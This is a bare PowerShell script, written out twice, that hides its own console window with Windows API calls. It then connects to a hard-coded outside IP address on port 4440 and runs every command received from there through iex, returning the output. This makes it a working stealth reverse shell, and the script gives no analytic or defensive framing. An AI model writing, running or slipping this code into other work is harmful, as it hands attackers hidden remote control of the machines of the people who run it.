# .Net methods for hiding/showing the console in the background
Add-Type -Name Window -Namespace Console -MemberDefinition '
[DllImport("Kernel32.dll")]
public static extern IntPtr GetConsoleWindow();

[DllImport("user32.dll")]
public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);
'

function Show-Console
{
    $consolePtr = [Console.Window]::GetConsoleWindow()

    # Hide = 0,
    # ShowNormal = 1,
    # ShowMinimized = 2,
    # ShowMaximized = 3,
    # Maximize = 3,
    # ShowNormalNoActivate = 4,
    # Show = 5,
    # Minimize = 6,
    # ShowMinNoActivate = 7,
    # ShowNoActivate = 8,
    # Restore = 9,
    # ShowDefault = 10,
    # ForceMinimized = 11

    [Console.Window]::ShowWindow($consolePtr, 4)
}

function Hide-Console
{
    $consolePtr = [Console.Window]::GetConsoleWindow()
    #0 hide
    [Console.Window]::ShowWindow($consolePtr, 0)
}

Hide-Console
$client = New-Object System.Net.Sockets.TCPClient("13.51.72.47",4440)
$river = $client.GetStream();[byte[]]$teeth = 0..65535|%{0}
while(($i = $river.Read($teeth, 0, $teeth.Length)) -ne 0){;$info = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($teeth,0, $i)
$return = (iex $info 2>&1 | Out-String )
$return2 = $return + "PS " + (pwd).Path + "> ";$sendteeth = ([text.encoding]::ASCII).GetBytes($return2);$river.Write($sendteeth,0,$sendteeth.Length)
$river.Flush()}
$client.Close() 

Add-Type -Name Window -Namespace Console -MemberDefinition '[DllImport("Kernel32.dll")] public static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);'
function Hide-Console
{
$consolePtr = [Console.Window]::GetConsoleWindow()
#0 hide
[Console.Window]::ShowWindow($consolePtr, 0)
}
Hide-Console
$client = New-Object System.Net.Sockets.TCPClient("13.51.72.47",4440)
$river = $client.GetStream();[byte[]]$teeth = 0..65535|%{0}
while(($i = $river.Read($teeth, 0, $teeth.Length)) -ne 0){;$info = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($teeth,0, $i)
$return = (iex $info 2>&1 | Out-String )
$return2 = $return + "PS " + (pwd).Path + "> ";$sendteeth = ([text.encoding]::ASCII).GetBytes($return2);$river.Write($sendteeth,0,$sendteeth.Length)
$river.Flush()}
$client.Close()
